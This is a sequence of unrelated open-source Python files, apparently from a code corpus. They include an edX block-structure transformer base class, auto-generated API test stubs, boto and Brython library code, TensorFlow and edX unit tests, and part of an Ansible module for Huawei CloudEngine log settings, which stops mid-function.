rp_returned = self.connb.Globals.get("tmp_rpath")
assert rp_returned.conn is rp.conn
assert rp_returned.path == rp.path
def tearDown(self):
SetConnections.CloseConnections()
if __name__ == "__main__": unittest.main()
| gpl-2.0 |
ESOedX/edx-platform | openedx/core/djangoapps/content/block_structure/transformer.py | 2 | 9170 | """
This module provides the abstract base class for all Block Structure
Transformers.
"""
from __future__ import absolute_import
from abc import abstractmethod
class BlockStructureTransformer(object):
"""
Abstract base class for all block structure transformers.
"""
# All Transformers are expected to maintain version-related class
# attributes. While the values for the base class is set to 0,
# the values for each concrete transformer should be 1 or higher.
#
# A transformer's version attributes are used by the block_structure
# framework in order to determine whether any collected data for a
# transformer is outdated because of a data schema change by the
# transformer.
#
# The WRITE_VERSION number is stored along with the transformer's
# data when it is collected and cached (during the collect phase).
# The READ_VERSION number is then verified to be less than or equal
# to the version associated with the collected data when the
# collected data is accessed (during the transform phase).
#
# We distinguish between WRITE_VERSION and READ_VERSION numbers in
# order to:
# 1. support blue-green deployments where new and previous versions
# of the code base are simultaneously executing on different
# workers for a period of time.
#
# A 2-phase deployment is used to stagger read and write changes.
#
# 2. scale for large deployments where it is costly to recompute
# block structures for all courses when a transformer's collected
# data schema changes.
#
# A background management command is run to prime the new data.
#
# See the following document for further information:
# https://openedx.atlassian.net/wiki/display/MA/Block+Structure+Cache+Invalidation+Proposal
#
# The WRITE_VERSION number of a Transformer should be incremented
# when it's collect implementation is additively changed. Backward
# compatibility should be maintained with previous READ_VERSIONs
# until all readers are updated.
#
# The READ_VERSION number of a Transformer should be incremented
# when its transform implementation is updated to make use of the
# newly collected data - and released only after all collected
# block structures are updated with the new WRITE_VERSION.
#
WRITE_VERSION = 0
READ_VERSION = 0
@classmethod
def name(cls):
"""
Unique identifier for the transformer's class. It is used to
identify the transformer's cached data. So it should be unique
and not conflict with other transformers. Consider using the
same name that is used in the Transformer Registry. For example,
for Stevedore, it is specified in the setup.py file.
Once the transformer is in use and its data is cached, do not
modify this name value without consideration of backward
compatibility with previously collected data.
"""
raise NotImplementedError
@classmethod
def collect(cls, block_structure):
"""
Collects and stores any xBlock and modulestore data into the
block_structure that's necessary for later execution of the
transformer's transform method. Transformers should store such
data in the block_structure using the following methods:
set_transformer_data
set_transformer_block_field
request_xblock_fields
Transformers can call block_structure.request_xblock_fields for
any common xBlock fields that should be collected by the
framework.
Any full block tree traversals should be implemented in this
collect phase, leaving the transform phase for fast and direct
access to a sub-block. If a block's transform output is
dependent on its ancestors' data, the ancestor's data should be
percolated down to the descendants. So when a (non-root) block
is directly accessed in the transform, all of its relevant data
is readily available (without needing to access its ancestors).
Traversals of the block_structure can be implemented using the
following methods:
topological_traversal
post_order_traversal
Arguments:
block_structure (BlockStructureModulestoreData) - A mutable
block structure that is to be modified with collected
data to be cached for the transformer.
"""
pass
@abstractmethod
def transform(self, usage_info, block_structure):
"""
Transforms the given block_structure for the given usage_info,
assuming the block_structure contains cached data from a prior
call to the collect method of the latest version of the
Transformer.
No access to the modulestore nor instantiation of xBlocks should
be performed during the execution of this method. However,
accesses to user-specific data (outside of the modulestore and
not via xBlocks) is permitted in order to apply the transform
for the given usage_info.
Note: The root of the given block_structure is not necessarily
the same as the root of the block_structure passed to the prior
collect method. The collect method is given the top-most root
of the structure, while the transform method may be called upon
any sub-structure or even a single block within the originally
collected structure.
A Transformer may choose to remove entire sub-structures during
the transform method and may do so using the remove_block and
filter_with_removal methods.
Amongst the many methods available for a block_structure, the
following methods are commonly used during transforms:
get_xblock_field
get_transformer_data
get_transformer_block_field
remove_block_traversal
filter_with_removal
filter_topological_traversal
topological_traversal
post_order_traversal
Arguments:
usage_info (any negotiated type) - A usage-specific object
that is passed to the block_structure and forwarded to all
requested Transformers in order to apply a
usage-specific transform. For example, an instance of
usage_info would contain a user object for which the
transform should be applied.
block_structure (BlockStructureBlockData) - A mutable
block structure, with already collected data for the
transformer, that is to be transformed in place.
"""
raise NotImplementedError
class FilteringTransformerMixin(BlockStructureTransformer):
"""
Transformers may optionally choose to implement this mixin if their
transform logic can be broken apart into a lambda for optimization of
combined tree traversals.
For performance reasons, developers should try to implement this mixin
whenever possible - with this alternative, traversal of the entire block
structure happens only once for all transformers that implement
FilteringTransformerMixin.
"""
def transform(self, usage_info, block_structure):
"""
By defining this method, FilteringTransformers can be run individually
if desired. In normal operations, the filters returned from multiple
transform_block_filters calls will be combined and used in a single
tree traversal.
"""
block_structure.filter_topological_traversal(self.transform_block_filters(usage_info, block_structure))
@abstractmethod
def transform_block_filters(self, usage_info, block_structure):
"""
This is an alternative to the standard transform method.
Returns a list of filter functions to be used for filtering out
any unwanted blocks in the given block_structure.
In addition to the commonly used methods listed above, the following
methods are commonly used by implementations of transform_block_filters:
create_universal_filter
create_removal_filter
Note: Transformers that implement this alternative should be
independent of all other registered transformers as they may not
be applied in the order in which they were listed in the registry.
Arguments:
usage_info (any negotiated type) - A usage-specific object
that is passed to the block_structure and forwarded to all
requested Transformers in order to apply a
usage-specific transform. For example, an instance of
usage_info would contain a user object for which the
transform should be applied.
block_structure (BlockStructureBlockData) - A mutable
block structure, with already collected data for the
transformer, that is to be transformed in place.
"""
raise NotImplementedError
| agpl-3.0 |
talon-one/talon_one.py | test/test_loyalty_membership.py | 1 | 2104 | # coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import talon_one
from talon_one.models.loyalty_membership import LoyaltyMembership # noqa: E501
from talon_one.rest import ApiException
class TestLoyaltyMembership(unittest.TestCase):
"""LoyaltyMembership unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test LoyaltyMembership
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = talon_one.models.loyalty_membership.LoyaltyMembership() # noqa: E501
if include_optional :
return LoyaltyMembership(
joined = datetime.datetime.strptime('2013-10-20 19:20:30.00', '%Y-%m-%d %H:%M:%S.%f'),
loyalty_program_id = 56
)
else :
return LoyaltyMembership(
loyalty_program_id = 56,
)
def testLoyaltyMembership(self):
"""Test LoyaltyMembership"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
| mit |
listingmirror/boto | boto/rds/dbsubnetgroup.py | 170 | 2825 | # Copyright (c) 2013 Franc Carter - [email protected]
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an DBSubnetGroup
"""
class DBSubnetGroup(object):
"""
Represents an RDS database subnet group
Properties reference available from the AWS documentation at http://docs.amazonwebservices.com/AmazonRDS/latest/APIReference/API_DeleteDBSubnetGroup.html
:ivar status: The current status of the subnet group. Possibile values are [ active, ? ]. Reference documentation lacks specifics of possibilities
:ivar connection: boto.rds.RDSConnection associated with the current object
:ivar description: The description of the subnet group
:ivar subnet_ids: List of subnet identifiers in the group
:ivar name: Name of the subnet group
:ivar vpc_id: The ID of the VPC the subnets are inside
"""
def __init__(self, connection=None, name=None, description=None, subnet_ids=None):
self.connection = connection
self.name = name
self.description = description
if subnet_ids is not None:
self.subnet_ids = subnet_ids
else:
self.subnet_ids = []
self.vpc_id = None
self.status = None
def __repr__(self):
return 'DBSubnetGroup:%s' % self.name
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'SubnetIdentifier':
self.subnet_ids.append(value)
elif name == 'DBSubnetGroupName':
self.name = value
elif name == 'DBSubnetGroupDescription':
self.description = value
elif name == 'VpcId':
self.vpc_id = value
elif name == 'SubnetGroupStatus':
self.status = value
else:
setattr(self, name, value)
| mit |
40223101/w17test | static/Brython3.1.1-20150328-091302/Lib/io.py | 623 | 9405 | import builtins
open = builtins.open
# for seek()
SEEK_SET = 0
SEEK_CUR = 1
SEEK_END = 2
r"""File-like objects that read from or write to a string buffer.
This implements (nearly) all stdio methods.
f = StringIO() # ready for writing
f = StringIO(buf) # ready for reading
f.close() # explicitly release resources held
flag = f.isatty() # always false
pos = f.tell() # get current position
f.seek(pos) # set current position
f.seek(pos, mode) # mode 0: absolute; 1: relative; 2: relative to EOF
buf = f.read() # read until EOF
buf = f.read(n) # read up to n bytes
buf = f.readline() # read until end of line ('\n') or EOF
list = f.readlines()# list of f.readline() results until EOF
f.truncate([size]) # truncate file at to at most size (default: current pos)
f.write(buf) # write at current position
f.writelines(list) # for line in list: f.write(line)
f.getvalue() # return whole file's contents as a string
Notes:
- Using a real file is often faster (but less convenient).
- There's also a much faster implementation in C, called cStringIO, but
it's not subclassable.
- fileno() is left unimplemented so that code which uses it triggers
an exception early.
- Seeking far beyond EOF and then writing will insert real null
bytes that occupy space in the buffer.
- There's a simple test set (see end of this file).
"""
try:
from errno import EINVAL
except ImportError:
EINVAL = 22
__all__ = ["StringIO"]
def _complain_ifclosed(closed):
if closed:
raise ValueError("I/O operation on closed file")
class StringIO:
"""class StringIO([buffer])
When a StringIO object is created, it can be initialized to an existing
string by passing the string to the constructor. If no string is given,
the StringIO will start empty.
The StringIO object can accept either Unicode or 8-bit strings, but
mixing the two may take some care. If both are used, 8-bit strings that
cannot be interpreted as 7-bit ASCII (that use the 8th bit) will cause
a UnicodeError to be raised when getvalue() is called.
"""
def __init__(self, buf = ''):
self.buf = buf
self.len = len(buf)
self.buflist = []
self.pos = 0
self.closed = False
self.softspace = 0
def __iter__(self):
return self
def next(self):
"""A file object is its own iterator, for example iter(f) returns f
(unless f is closed). When a file is used as an iterator, typically
in a for loop (for example, for line in f: print line), the next()
method is called repeatedly. This method returns the next input line,
or raises StopIteration when EOF is hit.
"""
_complain_ifclosed(self.closed)
r = self.readline()
if not r:
raise StopIteration
return r
def close(self):
"""Free the memory buffer.
"""
if not self.closed:
self.closed = True
del self.buf, self.pos
def isatty(self):
"""Returns False because StringIO objects are not connected to a
tty-like device.
"""
_complain_ifclosed(self.closed)
return False
def seek(self, pos, mode = 0):
"""Set the file's current position.
The mode argument is optional and defaults to 0 (absolute file
positioning); other values are 1 (seek relative to the current
position) and 2 (seek relative to the file's end).
There is no return value.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
if mode == 1:
pos += self.pos
elif mode == 2:
pos += self.len
self.pos = max(0, pos)
def tell(self):
"""Return the file's current position."""
_complain_ifclosed(self.closed)
return self.pos
def read(self, n = -1):
"""Read at most size bytes from the file
(less if the read hits EOF before obtaining size bytes).
If the size argument is negative or omitted, read all data until EOF
is reached. The bytes are returned as a string object. An empty
string is returned when EOF is encountered immediately.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
if n is None or n < 0:
newpos = self.len
else:
newpos = min(self.pos+n, self.len)
r = self.buf[self.pos:newpos]
self.pos = newpos
return r
def readline(self, length=None):
r"""Read one entire line from the file.
A trailing newline character is kept in the string (but may be absent
when a file ends with an incomplete line). If the size argument is
present and non-negative, it is a maximum byte count (including the
trailing newline) and an incomplete line may be returned.
An empty string is returned only when EOF is encountered immediately.
Note: Unlike stdio's fgets(), the returned string contains null
characters ('\0') if they occurred in the input.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
i = self.buf.find('\n', self.pos)
if i < 0:
newpos = self.len
else:
newpos = i+1
if length is not None and length >= 0:
if self.pos + length < newpos:
newpos = self.pos + length
r = self.buf[self.pos:newpos]
self.pos = newpos
return r
def readlines(self, sizehint = 0):
"""Read until EOF using readline() and return a list containing the
lines thus read.
If the optional sizehint argument is present, instead of reading up
to EOF, whole lines totalling approximately sizehint bytes (or more
to accommodate a final whole line).
"""
total = 0
lines = []
line = self.readline()
while line:
lines.append(line)
total += len(line)
if 0 < sizehint <= total:
break
line = self.readline()
return lines
def truncate(self, size=None):
"""Truncate the file's size.
If the optional size argument is present, the file is truncated to
(at most) that size. The size defaults to the current position.
The current file position is not changed unless the position
is beyond the new file size.
If the specified size exceeds the file's current size, the
file remains unchanged.
"""
_complain_ifclosed(self.closed)
if size is None:
size = self.pos
elif size < 0:
raise IOError(EINVAL, "Negative size not allowed")
elif size < self.pos:
self.pos = size
self.buf = self.getvalue()[:size]
self.len = size
def write(self, s):
"""Write a string to the file.
There is no return value.
"""
_complain_ifclosed(self.closed)
if not s: return
spos = self.pos
slen = self.len
if spos == slen:
self.buflist.append(s)
self.len = self.pos = spos + len(s)
return
if spos > slen:
self.buflist.append('\0'*(spos - slen))
slen = spos
newpos = spos + len(s)
if spos < slen:
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = [self.buf[:spos], s, self.buf[newpos:]]
self.buf = ''
if newpos > slen:
slen = newpos
else:
self.buflist.append(s)
slen = newpos
self.len = slen
self.pos = newpos
def writelines(self, iterable):
"""Write a sequence of strings to the file. The sequence can be any
iterable object producing strings, typically a list of strings. There
is no return value.
(The name is intended to match readlines(); writelines() does not add
line separators.)
"""
write = self.write
for line in iterable:
write(line)
def flush(self):
"""Flush the internal buffer
"""
_complain_ifclosed(self.closed)
def getvalue(self):
"""
Retrieve the entire contents of the "file" at any time before
the StringIO object's close() method is called.
The StringIO object can accept either Unicode or 8-bit strings,
but mixing the two may take some care. If both are used, 8-bit
strings that cannot be interpreted as 7-bit ASCII (that use the
8th bit) will cause a UnicodeError to be raised when getvalue()
is called.
"""
_complain_ifclosed(self.closed)
if self.buflist:
self.buf += ''.join(self.buflist)
self.buflist = []
return self.buf
TextIOWrapper = StringIO
class RawIOBase:
def read(self,n=-1):
pass
def readall(self):
pass
def readinto(self,b):
pass
def write(self,b):
pass
BufferedReader = RawIOBase
#from _io import *
| gpl-3.0 |
Edraak/edraak-platform | common/lib/xmodule/xmodule/assetstore/tests/test_asset_xml.py | 13 | 3646 | """
Test for asset XML generation / parsing.
"""
import unittest
from path import Path as path
from lxml import etree
from contracts import ContractNotRespected
from opaque_keys.edx.locator import CourseLocator
from xmodule.assetstore import AssetMetadata
from xmodule.modulestore.tests.test_assetstore import AssetStoreTestData
class TestAssetXml(unittest.TestCase):
"""
Tests for storing/querying course asset metadata.
"""
shard = 1
def setUp(self):
super(TestAssetXml, self).setUp()
xsd_filename = "assets.xsd"
self.course_id = CourseLocator('org1', 'course1', 'run1')
self.course_assets = []
for asset in AssetStoreTestData.all_asset_data:
asset_dict = dict(zip(AssetStoreTestData.asset_fields[1:], asset[1:]))
asset_md = AssetMetadata(self.course_id.make_asset_key('asset', asset[0]), **asset_dict)
self.course_assets.append(asset_md)
# Read in the XML schema definition and make a validator.
xsd_path = path(__file__).realpath().parent / xsd_filename
with open(xsd_path, 'r') as f:
schema_root = etree.XML(f.read())
schema = etree.XMLSchema(schema_root)
self.xmlparser = etree.XMLParser(schema=schema)
def test_export_single_asset_to_from_xml(self):
"""
Export a single AssetMetadata to XML and verify the structure and fields.
"""
asset_md = self.course_assets[0]
root = etree.Element("assets")
asset = etree.SubElement(root, "asset")
asset_md.to_xml(asset)
# If this line does *not* raise, the XML is valid.
etree.fromstring(etree.tostring(root), self.xmlparser)
new_asset_key = self.course_id.make_asset_key('tmp', 'tmp')
new_asset_md = AssetMetadata(new_asset_key)
new_asset_md.from_xml(asset)
# Compare asset_md to new_asset_md.
for attr in AssetMetadata.XML_ATTRS:
if attr in AssetMetadata.XML_ONLY_ATTRS:
continue
orig_value = getattr(asset_md, attr)
new_value = getattr(new_asset_md, attr)
self.assertEqual(orig_value, new_value)
def test_export_with_None_value(self):
"""
Export and import a single AssetMetadata to XML with a None created_by field, without causing an exception.
"""
asset_md = AssetMetadata(
self.course_id.make_asset_key('asset', 'none_value'),
created_by=None,
)
asset = etree.Element("asset")
asset_md.to_xml(asset)
asset_md.from_xml(asset)
def test_export_all_assets_to_xml(self):
"""
Export all AssetMetadatas to XML and verify the structure and fields.
"""
root = etree.Element("assets")
AssetMetadata.add_all_assets_as_xml(root, self.course_assets)
# If this line does *not* raise, the XML is valid.
etree.fromstring(etree.tostring(root), self.xmlparser)
def test_wrong_node_type_all(self):
"""
Ensure full asset sections with the wrong tag are detected.
"""
root = etree.Element("glassets")
with self.assertRaises(ContractNotRespected):
AssetMetadata.add_all_assets_as_xml(root, self.course_assets)
def test_wrong_node_type_single(self):
"""
Ensure single asset blocks with the wrong tag are detected.
"""
asset_md = self.course_assets[0]
root = etree.Element("assets")
asset = etree.SubElement(root, "smashset")
with self.assertRaises(ContractNotRespected):
asset_md.to_xml(asset)
| agpl-3.0 |
thjashin/tensorflow | tensorflow/contrib/session_bundle/gc_test.py | 34 | 4560 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for session_bundle.gc."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.session_bundle import gc
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
def tearDownModule():
gfile.DeleteRecursively(test.get_temp_dir())
class GcTest(test_util.TensorFlowTestCase):
def testLargestExportVersions(self):
paths = [gc.Path("/foo", 8), gc.Path("/foo", 9), gc.Path("/foo", 10)]
newest = gc.largest_export_versions(2)
n = newest(paths)
self.assertEquals(n, [gc.Path("/foo", 9), gc.Path("/foo", 10)])
def testLargestExportVersionsDoesNotDeleteZeroFolder(self):
paths = [gc.Path("/foo", 0), gc.Path("/foo", 3)]
newest = gc.largest_export_versions(2)
n = newest(paths)
self.assertEquals(n, [gc.Path("/foo", 0), gc.Path("/foo", 3)])
def testModExportVersion(self):
paths = [
gc.Path("/foo", 4), gc.Path("/foo", 5), gc.Path("/foo", 6),
gc.Path("/foo", 9)
]
mod = gc.mod_export_version(2)
self.assertEquals(mod(paths), [gc.Path("/foo", 4), gc.Path("/foo", 6)])
mod = gc.mod_export_version(3)
self.assertEquals(mod(paths), [gc.Path("/foo", 6), gc.Path("/foo", 9)])
def testOneOfEveryNExportVersions(self):
paths = [
gc.Path("/foo", 0), gc.Path("/foo", 1), gc.Path("/foo", 3),
gc.Path("/foo", 5), gc.Path("/foo", 6), gc.Path("/foo", 7),
gc.Path("/foo", 8), gc.Path("/foo", 33)
]
one_of = gc.one_of_every_n_export_versions(3)
self.assertEquals(
one_of(paths), [
gc.Path("/foo", 3), gc.Path("/foo", 6), gc.Path("/foo", 8),
gc.Path("/foo", 33)
])
def testOneOfEveryNExportVersionsZero(self):
# Zero is a special case since it gets rolled into the first interval.
# Test that here.
paths = [gc.Path("/foo", 0), gc.Path("/foo", 4), gc.Path("/foo", 5)]
one_of = gc.one_of_every_n_export_versions(3)
self.assertEquals(one_of(paths), [gc.Path("/foo", 0), gc.Path("/foo", 5)])
def testUnion(self):
paths = []
for i in xrange(10):
paths.append(gc.Path("/foo", i))
f = gc.union(gc.largest_export_versions(3), gc.mod_export_version(3))
self.assertEquals(
f(paths), [
gc.Path("/foo", 0), gc.Path("/foo", 3), gc.Path("/foo", 6),
gc.Path("/foo", 7), gc.Path("/foo", 8), gc.Path("/foo", 9)
])
def testNegation(self):
paths = [
gc.Path("/foo", 4), gc.Path("/foo", 5), gc.Path("/foo", 6),
gc.Path("/foo", 9)
]
mod = gc.negation(gc.mod_export_version(2))
self.assertEquals(mod(paths), [gc.Path("/foo", 5), gc.Path("/foo", 9)])
mod = gc.negation(gc.mod_export_version(3))
self.assertEquals(mod(paths), [gc.Path("/foo", 4), gc.Path("/foo", 5)])
def testPathsWithParse(self):
base_dir = os.path.join(test.get_temp_dir(), "paths_parse")
self.assertFalse(gfile.Exists(base_dir))
for p in xrange(3):
gfile.MakeDirs(os.path.join(base_dir, "%d" % p))
# add a base_directory to ignore
gfile.MakeDirs(os.path.join(base_dir, "ignore"))
# create a simple parser that pulls the export_version from the directory.
def parser(path):
match = re.match("^" + base_dir + "/(\\d+)$", path.path)
if not match:
return None
return path._replace(export_version=int(match.group(1)))
self.assertEquals(
gc.get_paths(
base_dir, parser=parser), [
gc.Path(os.path.join(base_dir, "0"), 0),
gc.Path(os.path.join(base_dir, "1"), 1),
gc.Path(os.path.join(base_dir, "2"), 2)
])
if __name__ == "__main__":
test.main()
| apache-2.0 |
cetic/ansible | lib/ansible/modules/network/cloudengine/ce_info_center_log.py | 42 | 20630 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = """
---
module: ce_info_center_log
version_added: "2.4"
short_description: Manages information center log configuration on HUAWEI CloudEngine switches.
description:
- Setting the Timestamp Format of Logs.
Configuring the Device to Output Logs to the Log Buffer.
author: QijunPan (@CloudEngine-Ansible)
options:
log_time_stamp:
description:
- Sets the timestamp format of logs.
required: false
default: null
choices: ['date_boot', 'date_second', 'date_tenthsecond', 'date_millisecond',
'shortdate_second', 'shortdate_tenthsecond', 'shortdate_millisecond',
'formatdate_second', 'formatdate_tenthsecond', 'formatdate_millisecond']
log_buff_enable:
description:
- Enables the Switch to send logs to the log buffer.
required: false
default: no_use
choices: ['no_use','true', 'false']
log_buff_size:
description:
- Specifies the maximum number of logs in the log buffer.
The value is an integer that ranges from 0 to 10240. If logbuffer-size is 0, logs are not displayed.
required: false
default: null
module_name:
description:
- Specifies the name of a module.
The value is a module name in registration logs.
required: false
default: null
channel_id:
description:
- Specifies a channel ID.
The value is an integer ranging from 0 to 9.
required: false
default: null
log_enable:
description:
- Indicates whether log filtering is enabled.
required: false
default: no_use
choices: ['no_use','true', 'false']
log_level:
description:
- Specifies a log severity.
required: false
default: null
choices: ['emergencies', 'alert', 'critical', 'error',
'warning', 'notification', 'informational', 'debugging']
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
- name: CloudEngine info center log test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Setting the timestamp format of logs"
ce_info_center_log:
log_time_stamp: date_tenthsecond
provider: "{{ cli }}"
- name: "Enabled to output information to the log buffer"
ce_info_center_log:
log_buff_enable: true
provider: "{{ cli }}"
- name: "Set the maximum number of logs in the log buffer"
ce_info_center_log:
log_buff_size: 100
provider: "{{ cli }}"
- name: "Set a rule for outputting logs to a channel"
ce_info_center_log:
module_name: aaa
channel_id: 1
log_enable: true
log_level: critical
provider: "{{ cli }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"log_time_stamp": "date_tenthsecond", "state": "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"log_time_stamp": "date_second"}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"log_time_stamp": "date_tenthsecond"}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["info-center timestamp log date precision-time tenth-second"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_nc_config, set_nc_config, ce_argument_spec
CE_NC_GET_LOG = """
<filter type="subtree">
<syslog xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<globalParam>
<bufferSize></bufferSize>
<logTimeStamp></logTimeStamp>
<icLogBuffEn></icLogBuffEn>
</globalParam>
<icSources>
<icSource>
<moduleName>%s</moduleName>
<icChannelId>%s</icChannelId>
<icChannelName></icChannelName>
<logEnFlg></logEnFlg>
<logEnLevel></logEnLevel>
</icSource>
</icSources>
</syslog>
</filter>
"""
CE_NC_GET_LOG_GLOBAL = """
<filter type="subtree">
<syslog xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<globalParam>
<bufferSize></bufferSize>
<logTimeStamp></logTimeStamp>
<icLogBuffEn></icLogBuffEn>
</globalParam>
</syslog>
</filter>
"""
TIME_STAMP_DICT = {"date_boot": "boot",
"date_second": "date precision-time second",
"date_tenthsecond": "date precision-time tenth-second",
"date_millisecond": "date precision-time millisecond",
"shortdate_second": "short-date precision-time second",
"shortdate_tenthsecond": "short-date precision-time tenth-second",
"shortdate_millisecond": "short-date precision-time millisecond",
"formatdate_second": "format-date precision-time second",
"formatdate_tenthsecond": "format-date precision-time tenth-second",
"formatdate_millisecond": "format-date precision-time millisecond"}
CHANNEL_DEFAULT_LOG_STATE = {"0": "true",
"1": "true",
"2": "true",
"3": "false",
"4": "true",
"5": "false",
"6": "true",
"7": "true",
"8": "true",
"9": "true"}
CHANNEL_DEFAULT_LOG_LEVEL = {"0": "warning",
"1": "warning",
"2": "informational",
"3": "informational",
"4": "warning",
"5": "debugging",
"6": "debugging",
"7": "warning",
"8": "debugging",
"9": "debugging"}
class InfoCenterLog(object):
"""
Manages information center log configuration
"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.init_module()
# module input info
self.log_time_stamp = self.module.params['log_time_stamp']
self.log_buff_enable = self.module.params['log_buff_enable']
self.log_buff_size = self.module.params['log_buff_size']
self.module_name = self.module.params['module_name']
self.channel_id = self.module.params['channel_id']
self.log_enable = self.module.params['log_enable']
self.log_level = self.module.params['log_level']
self.state = self.module.params['state']
# state
self.log_dict = dict()
self.changed = False
self.updates_cmd = list()
self.commands = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def init_module(self):
"""init module"""
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
def check_response(self, xml_str, xml_name):
"""Check if response message is already succeed"""
if "<ok/>" not in xml_str:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def get_log_dict(self):
""" log config dict"""
log_dict = dict()
if self.module_name:
if self.module_name.lower() == "default":
conf_str = CE_NC_GET_LOG % (self.module_name.lower(), self.channel_id)
else:
conf_str = CE_NC_GET_LOG % (self.module_name.upper(), self.channel_id)
else:
conf_str = CE_NC_GET_LOG_GLOBAL
xml_str = get_nc_config(self.module, conf_str)
if "<data/>" in xml_str:
return log_dict
xml_str = xml_str.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
# get global param info
glb = root.find("data/syslog/globalParam")
if glb:
for attr in glb:
if attr.tag in ["bufferSize", "logTimeStamp", "icLogBuffEn"]:
log_dict[attr.tag] = attr.text
# get info-center source info
log_dict["source"] = dict()
src = root.find("data/syslog/icSources/icSource")
if src:
for attr in src:
if attr.tag in ["moduleName", "icChannelId", "icChannelName", "logEnFlg", "logEnLevel"]:
log_dict["source"][attr.tag] = attr.text
return log_dict
def config_log_global(self):
"""config log global param"""
xml_str = '<globalParam operation="merge">'
if self.log_time_stamp:
if self.state == "present" and self.log_time_stamp.upper() != self.log_dict.get("logTimeStamp"):
xml_str += '<logTimeStamp>%s</logTimeStamp>' % self.log_time_stamp.upper()
self.updates_cmd.append(
"info-center timestamp log %s" % TIME_STAMP_DICT.get(self.log_time_stamp))
elif self.state == "absent" and self.log_time_stamp.upper() == self.log_dict.get("logTimeStamp"):
xml_str += '<logTimeStamp>DATE_SECOND</logTimeStamp>' # set default
self.updates_cmd.append("undo info-center timestamp log")
else:
pass
if self.log_buff_enable != 'no_use':
if self.log_dict.get("icLogBuffEn") != self.log_buff_enable:
xml_str += '<icLogBuffEn>%s</icLogBuffEn>' % self.log_buff_enable
if self.log_buff_enable == "true":
self.updates_cmd.append("info-center logbuffer")
else:
